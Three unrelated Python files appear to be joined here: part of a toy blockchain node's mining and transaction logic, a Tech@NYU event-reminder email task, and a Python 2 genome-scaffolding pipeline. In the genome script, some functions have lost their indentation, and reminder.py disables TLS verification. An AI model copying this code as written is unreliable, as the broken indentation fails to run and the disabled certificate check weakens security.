            self.chain.add_block(genesis);
            self.currentBlock = self.create_new_block()
        else:
            # Register with the bootstrap node; receive our id, the current
            # chain, and the ring.
            url = "http://" + ipBootstrap + ":" + str(portBootstrap) + "/registerNewNode"
            requestData = '{"ip":"' + myIp + '", "port":' + str(myPort) + ', "address":"' + str(self.myWallet.address) +'"}';
            response = requests.post(url, data = requestData);
            responseDict = json.loads(response.json());
            self.id = responseDict['id'];
            self.chain = self.reconstructChain(responseDict['chain']);
            if not self.valid_chain(self.chain):
                exit();
            else:
                print("Chain OK, got my Chain")
            self.ring = json.loads(responseDict['ring'])
            self.currentBlock = self.create_new_block()

    def verify_transaction(self, trans):
        # verifying the transaction using the public_key and the signature of the transaction object
        transDict = trans.to_dict();
        transDict.pop('signature');
        transString = json.dumps(transDict);
        transString = transString.encode();
        hTrans = SHA.new(transString);
        # sender_address is the hex-encoded RSA public key.
        verifier = PKCS1_v1_5.new(RSA.importKey(binascii.unhexlify(trans.sender_address)));
        return verifier.verify(hTrans, binascii.unhexlify(trans.signature))

    def create_new_block(self):
        #create a new block based on the last one of the chain
        newBlock = block.Block(self.chain.listOfBlocks[self.chain.length - 1].current_hash, self.chain.listOfBlocks[self.chain.length - 1].index, self.id);
        return newBlock;

    def create_wallet(self):
        #create a wallet for this node, with a public key and a private key
        new_wallet = wallet.wallet();
        return new_wallet;

    def validate_transaction(self, trans):
        #verification of signature and enough NBC's
        asked = '0';
        for k in self.ring:
            if self.ring[k]['address'] == trans.sender_address:
                asked = k;
        askedBalance = 0;
        for utxo in self.ring[asked]['utxos']:
            askedBalance += utxo['amount'];
        if not self.verify_transaction(trans):
            print("not a valid signature");
            return False;
        elif askedBalance < trans.amount:
            print("not enough NBC's");
            # BUG FIX: this branch previously returned True, accepting
            # transactions whose sender could not cover the amount.
            return False;
        else:
            return True;

    def dummy(self, receiver, amount):
        # Delayed helper run on a thread: give `amount` NBC to `receiver`.
        sleep(1)
        # Previously hard-coded 100; now honours the parameter (callers pass 100).
        self.create_transaction(receiver, amount)

    def dummy2(self, newID, newIp, newPort, newAddress):
        # Tell every other node (except the newcomer and ourselves) about the new node.
        for k in self.ring:
            if k != newID and k != str(self.id):
                url = "http://"+ self.ring[k]['ip'] + ":" + str(self.ring[k]['port']) + "/receiveNewNodeInfo";
                requestData = {'id': newID, 'ip': newIp, 'port': newPort, 'address': newAddress, 'utxos':[]};
                requests.post(url, data = json.dumps(requestData));

    def dummy3(self):
        # Small delay, then mine the now-full block (run on a thread).
        sleep(0.1);
        self.mine_block();

    def register_node_to_ring(self, newNodeIp, newNodePort, newNodeAddress):
        #add this node to the ring, only the bootstrap node can add a node to the ring after checking his wallet and ip:port address
        #bottstrap node informs all other nodes and gives the request node an id and 100 NBCs
        self.allow.wait();
        if self.current_id_count == self.number:
            return("{message: ring full}");
        tempDict = dict();
        tempDict['ip'] = newNodeIp;
        tempDict['port'] = newNodePort;
        tempDict['address'] = newNodeAddress;
        tempDict['utxos'] = [];
        self.ring[str(self.current_id_count)] = tempDict;
        message = {'id': self.current_id_count, 'chain': self.chain.to_json(), 'ring': json.dumps(self.ring)};
        message = json.dumps(message);
        # Grant the newcomer 100 NBC and broadcast its info, both async.
        crT = threading.Thread(target=self.dummy, args = (self.current_id_count, 100, ))
        crT.start();
        sendInfo = threading.Thread(target = self.dummy2, args=(str(self.current_id_count), newNodeIp,newNodePort, newNodeAddress,))
        sendInfo.start();
        self.current_id_count += 1;
        return message;

    def reconstructChain(self, chainJson):
        #input is a json. outputs a Blockchain Object
        chainDict = json.loads(chainJson);
        newL = chainDict['length'];
        newList = chainDict['listOfBlocks']
        temp = [];
        for blockStr in newList:
            blockDict = json.loads(blockStr)
            tempBlock = self.reconstructBlock(blockDict);
            temp.append(tempBlock);
        return blockchain.blockchain(newL, temp)

    def reconstructBlock(self, blockDict):
        #input is a dictionary. outputs a Block Object
        tempBlock = block.Block();
        tempBlock.creator = blockDict['creator']
        tempBlock.current_hash = blockDict['current_hash'];
        tempBlock.index = blockDict['index'];
        tempBlock.nonce = blockDict['nonce'];
        tempBlock.previous_hash = blockDict['previous_hash'];
        tempBlock.timestamp = blockDict['timestamp'];
        tempBlock.listOfTransactions = [];
        for transDict in blockDict['listOfTransactions']:
            tempTrans = self.reconstructTrans(transDict);
            tempBlock.listOfTransactions.append(tempTrans)
        return tempBlock;

    def reconstructTrans(self, transDict):
        #input is a dictionary. outputs a Transaction Object
        tempTrans = transaction.Transaction('0', '0', self.myWallet.address, 0);
        tempTrans.amount = transDict['amount'];
        tempTrans.receiver_address = transDict['receiver_address'];
        tempTrans.sender_address = transDict['sender_address'];
        tempTrans.signature = transDict['signature'];
        tempTrans.transaction_id = transDict['transaction_id'];
        tempTrans.transaction_inputs = transDict['transaction_inputs'];
        tempTrans.transaction_outputs = transDict['transaction_outputs'];
        return tempTrans;

    def create_transaction(self, receiver, amount):
        # creating a new transaction and broadcasting it
        inputUTXOS = [];
        outputUTXOS = [];
        myAmount = 0;
        # Collect our UTXOs until they cover the amount.
        for utxo in self.myWallet.transactions:
            myAmount += utxo['amount'];
            inputUTXOS.append(utxo);
            if myAmount >= amount:
                break;
        # Spend the inputs: remove them from our wallet and the ring view.
        for utxo in inputUTXOS:
            self.myWallet.transactions.remove(utxo);
            self.ring[str(self.id)]['utxos'].remove(utxo)
        newTrans = transaction.Transaction(self.myWallet.address, self.myWallet.private_key, self.ring[str(receiver)]['address'], amount, receiverID = str(receiver), senderID = str(self.id), inputs = inputUTXOS);
        outputUTXOS = newTrans.transaction_outputs;
        # Credit outputs (payment + change) to their owners.
        for utxo in outputUTXOS:
            self.ring[utxo['id']]['utxos'].append(utxo);
            if utxo['id'] == str(self.id):
                self.myWallet.transactions.append(utxo);
        self.broadcast_transaction(newTrans);
        self.currentBlock.add_transaction(newTrans);
        if len(self.currentBlock.listOfTransactions) == constants.CAPACITY:
            # Block is full: stop accepting registrations and mine it.
            self.mining = True;
            self.allow.clear();
            stM = threading.Thread(target = self.dummy3);
            stM.start()

    def broadcast_transaction(self, trans):
        # sending the transaction to every node in the ring
        for k in self.ring:
            if k != str(self.id):
                url = "http://" + self.ring[k]['ip'] + ":" + str(self.ring[k]['port']) +"/receiveTransaction";
                requestData = json.dumps(trans.to_dict());
                requests.post(url, data = requestData);

    def add_transaction_to_block(self, transDict):
        #adding a transaction to the bloc. if number_of_transactions == CAPACITY mine
        newTrans = self.reconstructTrans(transDict);
        if self.validate_transaction(newTrans):
            self.currentBlock.add_transaction(newTrans);
            # Apply the UTXO changes to our view of the ring.
            for utxo in newTrans.transaction_inputs:
                self.ring[utxo['id']]['utxos'].remove(utxo);
            for utxo in newTrans.transaction_outputs:
                self.ring[utxo['id']]['utxos'].append(utxo);
                if utxo['id'] == str(self.id):
                    self.myWallet.transactions.append(utxo)
            if len(self.currentBlock.listOfTransactions) == constants.CAPACITY:
                self.mining = True;
                self.allow.clear()
                stM = threading.Thread(target = self.dummy3);
                stM.start();

    def mine_block(self):
        # change the status of this node to mining and start looking for the nonce
        self.mining = True;
        self.otherNodeMined.clear();
        # Brute-force the nonce until the hash has MINING_DIFFICULTY leading
        # zeros, or a peer announces a winning block first.
        while self.currentBlock.current_hash[:constants.MINING_DIFFICULTY] != '0' * constants.MINING_DIFFICULTY and not self.otherNodeMined.is_set():
            self.currentBlock.nonce +=1;
            self.currentBlock.current_hash = self.currentBlock.myHash();
        self.mining = False;
        if not self.otherNodeMined.is_set():
            # We won the race: commit and broadcast our block.
            self.chain.add_block(self.currentBlock)
            self.broadcast_block();
        self.currentBlock = self.create_new_block();
        self.allow.set();

    def broadcast_block(self):
        # sending the block to every node in the ring
        for k in self.ring:
            if k != str(self.id):
                url = "http://" + self.ring[k]['ip'] + ":" + str(self.ring[k]['port']) +"/receiveBlock";
                requestData = self.currentBlock.to_json();
                requests.post(url, data = requestData);

    def valid_proof(self, blockToCheck):
        # checking the validity of a received block
        return blockToCheck.current_hash[:constants.MINING_DIFFICULTY] == '0' * constants.MINING_DIFFICULTY and blockToCheck.previous_hash == self.chain.lastBlock().current_hash

    def valid_chain(self, chain):
        #checking validity of chain: each block must link to its predecessor
        noElem = len(chain.listOfBlocks);
        for i in range(1, noElem):
            if not chain.listOfBlocks[i].previous_hash == chain.listOfBlocks[i - 1].current_hash:
                return False;
        return True;

    def resolve_conflicts(self):
        # asking all the nodes for the length of their chains and picking the longest
        maxLength = self.chain.length;
        maxChain = {};
        for k in self.ring:
            if k != str(self.id):
                url = "http://" + self.ring[k]['ip'] + ":" + str(self.ring[k]['port']) +"/printChain";
                response = requests.get(url);
                responseDict = json.loads(response.json());
                if int(responseDict['length']) > maxLength:
                    maxChain = responseDict;
                    maxLength = int(responseDict['length']);
        if maxLength > self.chain.length:
            # Adopt the longest chain seen.
            self.chain = self.reconstructChain(json.dumps(maxChain));
|
reminder.py | import os
import requests
from datetime import datetime
from dateutil.parser import parse
from dateutil import tz
from pytz import timezone
from threading import Thread
from overlord import celery
from utils import Event, Email, headers
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
class ReminderEmail(Email):
    """Builds and sends day-before reminder emails for a Tech@NYU event.

    Relies on attributes presumably initialised by the Email base class:
    event_data, eboard_members, attendees, server (SMTP) — TODO confirm.
    """

    def _get_time(self):
        """
        Changes UTC time fetched from the API to New York Time
        """
        date_time = self.event_data[0]['attributes']['startDateTime']
        time = parse(date_time).replace(tzinfo=tz.gettz('UTC'))
        central_time = time.astimezone(tz.gettz('America/New_York'))
        # Return "HH:MM" (drop seconds).
        return ":".join(str(central_time.time()).split(":")[0:2])

    def _get_emails(self, event_id):
        # Fetch the event plus its RSVPs; sort people with roles into
        # eboard_members, everyone else into attendees. Silently returns
        # on a non-200 response.
        res = requests.get('https://api.tnyu.org/v3/events/' + event_id +
                           '?include=rsvps', headers=headers, verify=False)
        if res.status_code != 200:
            return
        r = res.json()
        self.event_data.append(r['data'])
        for post in r['included']:
            if post['attributes'].get('contact'):
                if post['attributes']['roles']:
                    self.eboard_members.append(post)
                else:
                    self.attendees.append(post)

    def _venue_address(self):
        # Resolve the event's venue and return its address with one
        # component per line.
        venue_id = self.event_data[0]['relationships'][
            'venue']['data']['id']
        venue = requests.get(
            "https://api.tnyu.org/v3/venues/" + venue_id, headers=headers)
        address = venue.json()['data']['attributes']['address']
        address_str = "\n".join(address.split(","))
        return address_str

    def _generate_emails(self, members):
        """Send a plain-text + HTML confirmation email to each member."""
        address = self._venue_address()
        time = self._get_time()
        for i, member in enumerate(members):
            msg = MIMEMultipart('alternative')
            msg['Subject'] = "Confirmation for Tech@NYU's " + self.event_data[0]['attributes']['title']
            msg['From'] = "Tech@NYU Feedback <" + os.environ['TNYU_EMAIL'] +">"
            msg['To'] = members[i]['attributes']['contact']['email']
            text = ("Hi " + members[i]['attributes']['name'] + "!\n\n" +
                    "This is your confirmation for the Tech@NYU " +
                    self.event_data[0]['attributes']['title'] + " tomorrow at " +
                    time + ". The event will be held at: \n\n" + address +
                    "\n\nWe look forward to seeing you! Feel free to reach out" +
                    " to us if you have any other questions. For more updates" +
                    " feel free to follow us on Twitter or Facebook. \n\n" +
                    "Thank you")
            # HTML variant needs <br> line breaks instead of newlines.
            address_str = ''
            for item in address.split('\n'):
                address_str += item.strip() + "<br>"
            html = (
                "<html>" +
                "<head></head>" +
                "<body>" +
                "<p>Hi " + members[i]['attributes']['name'] + "!</p>" +
                "<p>This is your confirmation for the Tech@NYU " +
                self.event_data[0]['attributes']['title'] + " tomorrow at " +
                time + ". The event will be held at:</p>" +
                "<p>" + address_str + "</p>" +
                "<p>We look forward to seeing you! Feel free to reach out " +
                "to us if you have any other questions. For more updates " +
                "feel free to follow us on <a href='https://twitter.com/techatnyu'>Twitter</a> or <a href='https://www.facebook.com/TechatNYU/'>Facebook</a>.</p>"+
                "<p>Thank you</p>"
                "</body>" +
                "</html>")
            part1 = MIMEText(text, 'plain')
            part2 = MIMEText(html, 'html')
            msg.attach(part1)
            msg.attach(part2)
            try:
                err = self.server.sendmail(os.environ['TNYU_EMAIL'], members[i][
                    'attributes']['contact']['email'], msg.as_string())
                if err:
                    print(err)
            except UnicodeEncodeError:
                # Skip recipients whose data can't be encoded rather than abort the batch.
                continue

    def send_emails(self, event_id):
        """Fetch RSVPs for event_id and email eboard members and attendees."""
        self._get_emails(event_id)
        self._generate_emails(self.eboard_members)
        self._generate_emails(self.attendees)
def get_resource(sort=None):
    """Fetch events from the Tech@NYU API.

    `sort`, when given, is an attribute name (e.g. "startDateTime") passed
    as "?sort=-<attr>" for descending order. The previous implementation
    raised TypeError for the default sort=None ("?sort=-" + None); now the
    default simply requests the unsorted collection.
    """
    root_url = "https://api.tnyu.org/v3/events/"
    query = "?sort=-" + sort if sort else ""
    r = requests.get(root_url + query, headers=headers)
    return r.json()
def get_events_in_future():
    """Return Event objects for events starting tomorrow (New York time)."""
    resources = get_resource(sort="startDateTime")['data']
    events = [Event(x) for x in resources]
    # Change UTC to New York Time
    today = timezone("America/New_York").localize(datetime.today()).date()
    future_events = []
    for event in events:
        # Some events may lack a startDateTime; skip those.
        startDateTime = getattr(event, 'startDateTime', None)
        if startDateTime:
            event_date = parse(event.startDateTime).replace(tzinfo=tz.gettz('UTC')).astimezone(tz.gettz('America/New_York')).date()
            # Check if the event is tomorrow
            if (event_date - today).days == 1:
                future_events.append(event)
    return future_events
@celery.task
def send_emails():
    """Celery task: send reminder emails for every event happening tomorrow.

    Each event is handled on its own thread; returns the number of events
    processed (threads are not joined, so sending may still be in flight).
    """
    emails = ReminderEmail()
    events = get_events_in_future()
    for event in events:
        thr = Thread(target=emails.send_emails, args=[event.id])
        thr.start()
    return len(events)
|
genomeScaffolding.py | import subprocess, os, sys
from collections import defaultdict, OrderedDict
import numpy as np
from multiprocessing import Pool, Queue, Process
from threading import Thread
import subprocess,shutil
from pybedtools import BedTool
from jcvi.formats import gff
from pyfaidx import Fasta
import time
"""python genomeScaffolding.py ReferenceBuild sampleBuild CDSProtID OldCDSGeneName protID1 weight1 protID2 weight2 ..."""
# CLI: genomeScaffolding.py ReferenceBuild sampleBuild CDSProtID OldCDSGeneName protID1 weight1 ...
CDSgeneNaming = sys.argv[4]  # old gene-name prefix used in the CDS reference
CDSspecies = sys.argv[3]  # folder name (under referenceGenomes/) of the CDS species
args = sys.argv[5:]  # alternating protID / weight pairs
root = os.getcwd()+'/'
weights = OrderedDict()  # protID -> integer weight, in CLI order
listSamplesv0 = [folder for folder in os.listdir('v0') if folder.endswith('v0')]
# Build flags default to 1 (build) when missing or non-numeric.
try:
    ReferenceBuild = int(sys.argv[1])
except:
    ReferenceBuild = 1
try:
    sampleBuild = int(sys.argv[2])
except:
    sampleBuild = 1
print args
print CDSgeneNaming
print CDSspecies
# Pair up protID/weight arguments; bad pairs are reported and skipped.
for i in np.arange(0,len(args),2):
    try:
        weights[args[i]]=int(args[i+1])
    except:
        print args
print weights
runCommand = lambda x: subprocess.call(x,shell=True)  # run one shell command string
# Boilerplate fragments for the generated cluster shell scripts.
binbash = "#!/bin/bash"
makeTrashFolder = 'mkdir oldFiles'
moduleLoads = """module load cufflinks/2.2.1
module load samtools/1.3.1
module load gmap
module load parallel/20150222
module load bedtools/2.25.0
module unload gcc
module load gcc/6.3.0
"""
def runCommands(q):
while not q.empty():
print q
try:
print q.get()
runCommand(q.get())
except:
with open('Error.txt','a') as f:
f.write(q.get()+'\n')
q.task_done()
def buildReferences(reference): # essentially keys of weights
global root
global binbash, makeTrashFolder, moduleLoads
print reference
os.chdir('./referenceGenomes/'+reference)
#print os.getcwd()
#print os.listdir('.')
fastaOld = [fasta for fasta in os.listdir('.') if 'cds' not in fasta.lower() and (fasta.endswith('.fa') or fasta.endswith('.fasta'))][0]
#Fasta(fastaOld)
#gff.load([file for file in os.listdir('.') if 'cufflinks' not in file and (file.endswith('.gff3') or file.endswith('.gff'))][0])
writeCommands = [binbash,moduleLoads,makeTrashFolder,'samtools faidx %s'%fastaOld,
'python -m jcvi.formats.gff load %s %s --parents=mRNA --children=CDS -o %s'%([file for file in os.listdir('.') if 'cufflinks' not in file and (file.endswith('.gff3') or file.endswith('.gff'))][0],fastaOld,reference+'.cds'),
'python -m jcvi.formats.gff bed --type=mRNA --key=Name %s -o %s'%([file for file in os.listdir('.') if 'cufflinks' not in file and (file.endswith('.gff3') or file.endswith('.gff'))][0],reference+'.bed'),
'python %sreplacepath.py %s'%(root,reference+'.bed'),'mv %s %s ..'%(reference+'.bed',reference+'.cds')]
#binbash,makeTrashFolder,moduleLoads,
#print '\n'.join(writeCommands)
"""if __name__ == '__main__':
q = Queue(maxsize=0)
for command in writeCommands:
q.put(command)
runCommands(q)"""
"""for command in writeCommands:
print command
try:
runCommand(command)
except:
with open('Error.txt','a') as f:
f.write(command+'\n')"""
"""for i, command in writeCommands:
print command
if (i == 3 or i==4) and (reference + '.bed' not in os.listdir('..') or os.stat('../'+reference + '.bed').st_size == 0):
runCommand(command)
elif i == 2 and (reference + '.cds' not in os.listdir('..') or os.stat('../'+reference + '.cds').st_size == 0):
runCommand(command)
elif i not in range(2, 7):
runCommand(command)"""
with open('buildReference.sh','w') as f:
f.write('\n'.join(writeCommands))
subprocess.call(['nohup','sh','buildReference.sh'])
os.chdir(root)
#print ReferenceBuild
# CDS fasta of the primary reference species (first match wins; assumes one exists).
CDSOld = [fasta for fasta in os.listdir('./referenceGenomes/%s'%CDSspecies) if 'cds' in fasta.lower() and (fasta.endswith('.fa') or fasta.endswith('.fasta'))][0]
# Symlink commands (two per reference) that expose each reference's .cds/.bed
# inside a sample folder; appended to per-sample build scripts.
linkReferences = ['ln -s %s%s/%s.cds %s.cds\nln -s %s%s/%s.bed %s.bed'%(root,'referenceGenomes',ref,ref,root,'referenceGenomes',ref,ref) for ref in weights.keys()]
def buildSamplesv0(sample): #sample = Bdist_xxx_v0.fa
    """Build v0 annotation files for one sample genome.

    Writes buildSample.sh (gmap_build/gmap alignment of the reference CDS,
    gene renaming, jcvi bed/cds extraction, reference symlinks), submits it
    via qsub, then polls every 10s for the finishBuild.txt sentinel the
    script creates on completion. Side effects only; changes cwd and
    restores it at the end.
    """
    global root
    global CDSspecies, CDSOld
    global binbash, makeTrashFolder, moduleLoads
    global CDSgeneNaming, linkReferences
    print sample
    os.chdir('v0/'+sample)
    fastaNew = sample+'.fa'
    geneNaming = sample.replace('_','') # -t is number of worker threads
    # Drop any stale sentinel so the wait loop below doesn't exit early.
    runCommand('rm finishBuild.txt')
    writeCommands = [binbash,moduleLoads,makeTrashFolder,'rm -r %s %s.gff3.db %s.chromosome *.iit %s.coords'%(geneNaming,geneNaming,geneNaming,geneNaming),
                     'samtools faidx %s' %fastaNew,
                     'gmap_build --dir=. -d %s %s' % (geneNaming,fastaNew),
                     'gmap --dir=. -d %s -B 5 -A --format=gff3_gene -n 1 -t 6 %s > %s 2> %s' % (
                     geneNaming, '../../referenceGenomes/%s/'%CDSspecies + CDSOld, geneNaming + '.gff3', geneNaming + '.log'),
                     'python %srenameGenes.py %s %s %s' %(root,geneNaming + '.gff3', CDSgeneNaming ,geneNaming),
                     'python -m jcvi.formats.gff bed --type=mRNA --key=Name %s -o %s' % (geneNaming + '.gff3', sample + '.bed'),
                     'python -m jcvi.formats.gff load %s %s --parents=mRNA --children=CDS -o %s' % (
                     geneNaming+'.gff3', fastaNew,sample + '.cds')]+linkReferences+['> finishBuild.txt']
    #"""'python %sgff2CDSBed.py %s'%(root,geneNaming + '.gff3'),'sortBed -i %s.CDS.bed > %s.CDS2.bed'%(geneNaming,geneNaming),
    #'python %sformatBed.py s %s v0 1'%(root,geneNaming+'.CDS2'),'bedtools getfasta -name -fi ./%s -bed %s.CDS2.bed -fo %s.cds'%(fastaNew,geneNaming,sample)
    #]"""#'mv %s %s ..'%(sample+'.cds',sample+'.bed') binbash, moduleLoads, makeTrashFolder,
    #'python -m jcvi.formats.gff load %s %s --feature=CDS --id_attribute=Name -o %s' % (geneNaming + '.gff3', fastaNew,sample + '.cds'),
    #'mergeBed -c 4 -i %s.CDS2.bed > %s.CDS.bed'%(geneNaming,geneNaming)
    #print writeCommands
    #print os.getcwd()
    #open('buildSample.sh', 'w').close()
    """if __name__ == '__main__':
        q = Queue(maxsize=0)
        for command in writeCommands:
            q.put(command)
        runCommands(q)"""
    i=0
    """
    for command in writeCommands:
        #print i,command
        #print i
        if (i == 2 or i == 3 or i == 4) and (geneNaming + '.gff3' not in os.listdir('.') or os.stat(geneNaming + '.gff3').st_size ==0):
            print(command)
            runCommand(command)
        elif i==5 and (sample + '.bed' not in os.listdir('.') or os.stat(sample + '.bed').st_size ==0):
            print(command)
            runCommand(command)
        elif i == 6 and (sample + '.cds' not in os.listdir('.') or os.stat(sample + '.cds').st_size ==0):
            print(command)
            runCommand(command)
        elif i not in range(2,7):
            print(command)
            runCommand(command)
        i+=1
    """
    with open('buildSample.sh', 'w') as f:
        f.write('\n'.join(writeCommands))
    #subprocess.call(['nohup', 'sh', 'buildSample.sh'])
    # Submit to the cluster; job name derives from the sample's middle token.
    runCommand('qsub -P plant-analysis.p -N %s -cwd -l high.c -pe pe_slots 16 -e %s %s' % (
    'build'+sample.split('_')[1], 'ErrFile.txt', 'buildSample.sh'))
    # Busy-wait for the sentinel file created by the last script command.
    while True:
        if os.path.isfile('finishBuild.txt'):
            break
        else:
            time.sleep(10)
    os.chdir(root)
    """try:
        runCommand(command)
    except:
        with open('Error.txt','a') as f:
            f.write(command+'\n')"""
    """with open('buildSample.sh','w') as f:
        f.write('\n'.join(writeCommands))
    try:
        subprocess.call(['nohup','sh','buildSample.sh'])
    except:
        with open('output.txt', 'a') as f:
            f.write('Error in %s'%sample)"""
    """writeCommands2 = [binbash, moduleLoads,'gmap_build --dir=. -d %s %s' % (geneNaming,fastaNew),
                      'gmap --dir=. -d %s -B 5 -A --format=gff3_gene -n 1 -t 8 %s > %s 2> %s' % (
                      geneNaming, CDSOld, geneNaming + '.gff3', geneNaming + '.log'),
                      'python %srenameGenes.py %s %s %s' % (root, geneNaming + '.gff3', CDSgeneNaming, geneNaming),
                      'python -m jcvi.formats.gff bed --type=mRNA --key=Name %s -o %s' % (
                      geneNaming + '.gff3', sample + '.bed'),
                      'python -m jcvi.formats.gff bed --type=CDS --key=Name %s -o %s' % (
                      geneNaming + '.gff3', sample + '.CDS.bed'),
                      'bedtools getfasta -name -fi ./%s -bed %s.CDS.bed -fo %s.cds' % (
                      fastaNew, sample, sample)]
    with open('buildSample.sh', 'w') as f:
        f.write('\n'.join(writeCommands2))
    subprocess.call(['nohup', 'sh', 'buildSample.sh'])"""
# Create the v1 output tree (one folder + OldFiles subfolder per sample).
# The blanket except makes this idempotent: re-runs skip existing dirs.
try:
    os.mkdir('v1')
    for folder in listSamplesv0:
        os.mkdir('v1/%s'%folder.replace('v0','v1'))
        os.mkdir('v1/%s/OldFiles'%folder.replace('v0','v1'))
except:
    pass
# Map each v0 sample folder name to its v1 counterpart.
buildCorrespondence = {folder:folder.replace('v0','v1') for folder in listSamplesv0}
listSamplesv1 = buildCorrespondence.values()
print listSamplesv1
def replaceGeneNames(sample,ref,count=0,nuc=0):
    """Rewrite gene names in ref/sample BED files and their synteny map.

    Genes are renamed to sequential ids (ref+nucAdd+'_N' on the reference
    side, sampleProt+nucAdd+'_N' on the sample side) and the anchor/synteny
    file is rewritten to use the new names.  `count` seeds the sample-side
    counter so ids stay unique across calls; the updated count is returned.
    `nuc` switches from lifted-anchor mode to the nucmer (nucMap.bed) file
    set and swaps which anchor column maps to which side.
    """
    refGeneCount = 0
    synmap = '%s.%s.lifted.anchors' % (sample, ref)
    if nuc:
        nucAdd = 'nuc'
        synmap = 'nucMap.bed'
        refbed = ref + '_nucSyn.bed'
        sampbed = sample + '_nucSyn.bed'
        a, b = 1, 0
    else:
        nucAdd = ''
        refbed = ref + '.bed'
        sampbed = sample + '.bed'
        a, b = 0, 1
    # Protein/sample tag is the middle underscore-delimited token of the sample name.
    sampleProt = sample.split('_')[1]
    with open(refbed,'r') as f:
        refBedLines = f.readlines()
    refBedOut = []
    refGenes = defaultdict(list)
    for line in refBedLines:
        if line:
            # BED column 4 is the gene name; map old name -> new sequential id.
            refGenes[line.split('\t')[3]] = ref+nucAdd+'_'+str(refGeneCount)
            refBedOut.append(line.replace(line.split('\t')[3],ref+nucAdd+'_'+str(refGeneCount)))
            refGeneCount+=1
    #ref+'_syn'+'.bed',sample+'_%ssyn'%ref+'.bed'
    #print refGenes
    with open(sampbed,'r') as f:
        sampBedLines = f.readlines()
    sampBedOut = []
    sampGenes = defaultdict(list)
    for line in sampBedLines:
        if line:
            sampGenes[line.split('\t')[3]] = sampleProt+nucAdd+'_'+str(count)
            sampBedOut.append(line.replace(line.split('\t')[3], sampleProt + nucAdd + '_' + str(count)))
            count+=1
    with open(synmap,'r') as f:
        synRead = f.readlines()
    synOut = []
    for line in synRead:
        # '###' marks block separators in anchor files; skip them.
        if line and '###' not in line:
            try:
                genes = line.split('\t')
                print genes
                synOut.append(line.replace(genes[0],refGenes[genes[a]]).replace(genes[1],sampGenes[genes[b]]))
            except:
                # Malformed lines are logged rather than aborting the rewrite.
                with open('Err.txt','a') as f:
                    f.write(line+'\n')
    """
    if nuc:
        print sampBedOut[0:10]
        print refBedOut[0:10]
        print sampGenes.items()[0:10]
        print refGenes.items()[0:10]
        print synOut[0:10]
        with open('nucMap.bed','r') as f:
            print f.readlines()[0:10]
    """
    # Anchor mode writes renamed copies under *_syn names; nuc mode rewrites in place.
    if nuc == 0:
        for writeTuple in [(ref+'_syn'+'.bed',refBedOut),(sample+'_%ssyn'%ref+'.bed',sampBedOut),(synmap,synOut)]:
            with open(writeTuple[0],'w') as f:
                f.writelines(writeTuple[1])
    else:
        for writeTuple in [(refbed,refBedOut),(sampbed,sampBedOut),(synmap,synOut)]:
            with open(writeTuple[0],'w') as f:
                f.writelines(writeTuple[1])
    return count
def tiling2bed(tilingFile,ref,sample,sampBed):
    """Convert a nucmer show-tiling file into paired *_nucSyn.bed files plus nucMap.bed.

    For each tiling line, the ref interval (cols 0-1) and sample interval
    (cols 2-4) are turned into BED entries (start decremented to 0-based),
    and a sample-interval -> ref-interval mapping is accumulated.  Sample
    intervals that do not overlap the sample's existing annotation (BedTool
    subtract -A against sampBed) are dropped, and the surviving mapping is
    written to nucMap.bed as 'sampleGene<TAB>refGene<TAB>100' lines.
    Python 2 only: relies on map() returning a list.
    """
    with open(tilingFile,'r') as f:
        tilingLines = f.read().split('\n')
    genesDict = defaultdict(list)
    with open(ref+'_nucSyn.bed','w') as f1, open(sample+'_nucSyn.bed','w') as f2:
        for line in tilingLines:
            if line:
                lineList = line.split('\t')
                # sorted() normalizes reversed (minus-strand) coordinates.
                int1 = sorted(map(int,lineList[0:2]))
                int1[0] -= 1
                int2 = sorted(map(int,lineList[2:4]))
                int2[0] -= 1
                f1.write('\t'.join([lineList[-2]]+map(str,int1)+['_'.join([lineList[-2]]+map(str,int1)),'0','+']) + '\n')
                f2.write('\t'.join([lineList[-1]]+map(str,int2)+['_'.join([lineList[-1]]+map(str,int2)),'0','+']) + '\n')
                genesDict['_'.join([lineList[-1]]+map(str,int2))] = '_'.join([lineList[-2]]+map(str,int1))
    # Keep only sample intervals that fully survive subtraction of existing genes.
    b = BedTool(sample+'_nucSyn.bed').subtract(BedTool(sampBed),A=True)
    #print b.head()
    #print genesDict.keys()[0:10]
    origGenes = set(genesDict.keys())
    #print str(b).split('\n')[0:10]
    #print [ line.split('\t')[3] for line in str(b).split('\n') if line][0:10]
    remainGenes = set([ line.split('\t')[3] for line in str(b).split('\n') if line])
    #print list(remainGenes)[0:10]
    BadGenes = list(origGenes - remainGenes)
    #print BadGenes[0:10]
    #print len(origGenes), len(remainGenes), len(BadGenes)
    #exit()
    for gene in BadGenes:
        try:
            del genesDict[gene]
        except:
            pass
    with open('nucMap.bed','w') as f:
        f.write('\n'.join('%s\t%s\t100'%item for item in genesDict.items() if item))
fastaNucOld = [fasta for fasta in os.listdir('./referenceGenomes/%s'%CDSspecies) if 'cds' not in fasta.lower() and (fasta.endswith('.fa') or fasta.endswith('.fasta'))][0]
def generatev1(sample):
    """Assemble the v1 genome for one v0 sample via multi-reference synteny.

    Pipeline (all via generated shell scripts): nucmer tiling against the
    primary reference, jcvi ortholog anchors against every weighted
    reference, gene renaming (replaceGeneNames), synteny bed construction,
    allmaps merge, and finally a qsub'd allmaps path run that writes the
    v1 fasta.  Side effects only; changes cwd and restores it at the end.
    """
    os.chdir('v0/%s'%sample)
    print sample.replace('v0', 'v1')
    global binbash, makeTrashFolder, moduleLoads, root, weights, fastaNucOld, CDSspecies
    #print weights
    print '\n'.join('%s %d'%(key,weights[key]) for key in weights.keys())#weights.keys()#'\n'.join('%s %d'%(key,weights[key]) for key in sorted(weights, key=weights.get, reverse=True).keys())
    print 'hi'
    """if __name__ == '__main__':
        p = Pool(None)
        p.imap(pairwise, [(sample,ref) for ref in weights.keys()])"""
    # allmaps weights file: first reference, then the nucmer track (weight-1),
    # then the remaining references. Relies on py2 dict key-order stability.
    with open('weights.txt','w') as f:
        f.write('\n'.join([weights.keys()[0]+' %d'%weights[weights.keys()[0]],'%snuc %d'%(CDSspecies,weights[CDSspecies]-1)]+['%s %d'%(key,weights[key]) for key in weights.keys()[1:]]))
    nucCommands = [binbash,moduleLoads]+ ['nucmer -t 6 -p %s %s %s'%(CDSspecies+'nuc',root+'referenceGenomes/%s/'%CDSspecies+fastaNucOld,sample+'.fa'),
                   'delta-filter -m -q -i 85 -u 50 %snuc.delta > %snuc2.delta'%(CDSspecies,CDSspecies),'show-tiling -a %snuc2.delta > %snuc.tiling'%(CDSspecies,CDSspecies)]
